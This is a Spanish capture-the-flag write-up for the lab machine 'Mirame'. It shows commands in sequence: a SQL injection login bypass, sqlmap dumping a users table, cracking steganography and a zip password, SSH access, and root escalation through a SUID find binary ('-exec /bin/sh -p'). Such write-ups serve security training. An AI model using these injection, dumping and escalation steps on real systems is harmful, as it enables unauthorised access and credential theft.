Mirame
✍️ Autor: maciiii___ 🔍 Dificultad: Fácil 📅 Fecha de creación: 12/08/2024
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2
para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p22,80 -v 172.17.0.2
para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea un panel de Login.

🚀 EXPLOTACIÓN
Probamos con credenciales básicas y nada pero con una inyección básica si tenemos suerte.
'or 1=1-- -
Tras esto nos sale este panel en que si ingresas algo te sale la temperatura.

Vamos a probar con sqlmap para ver que bases de datos hay.
sqlmap -u "http://172.17.0.2/index.php" --forms --batch --dbs

Ahora vemos el contenido de la base de datos users.
sqlmap -u "http://172.17.0.2/index.php" --forms --batch -D users --tables

Ahora vemos el contenido de la tabla de usuarios.
sqlmap -u "http://172.17.0.2/index.php" --forms --batch -D users -T usuarios --dump

Vemos que hay un usuario llamado directorio con la contraseña directoriotravieso suponemos que es un directorio por lo que miramos a ver.

Nos descargamos la imagen para ver si se puede usar la esteganografía. Usamos esta herramienta ya que contiene una contraseña.
stegcracker miramebien.jpg /usr/share/wordlists/rockyou.txt

Miramos que contiene la imagen escondido.
steghide extract -sf miramebien.jpg

Vemos que hay un archivo comprimido llamado ocultito.zip pero al descomprimirlo nos pide una contraseña. Por lo que usamos John.
zip2john ocultito.zip > hash
Usamos John para obtener la contraseña.
john hash

Descomprimimos ahora sí el .zip
.

Conseguimos unas credenciales.
ssh carlos@172.17.0.2
🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar. No tenemos permisos SUDO.

Buscamos permisos SUID.
find / -perm -4000 2>/dev/null

Nos llama la atención find por lo que buscamos en esta página cómo explotarlo.
/usr/bin/find . -exec /bin/sh -p \; -quit

Last updated
Was this helpful?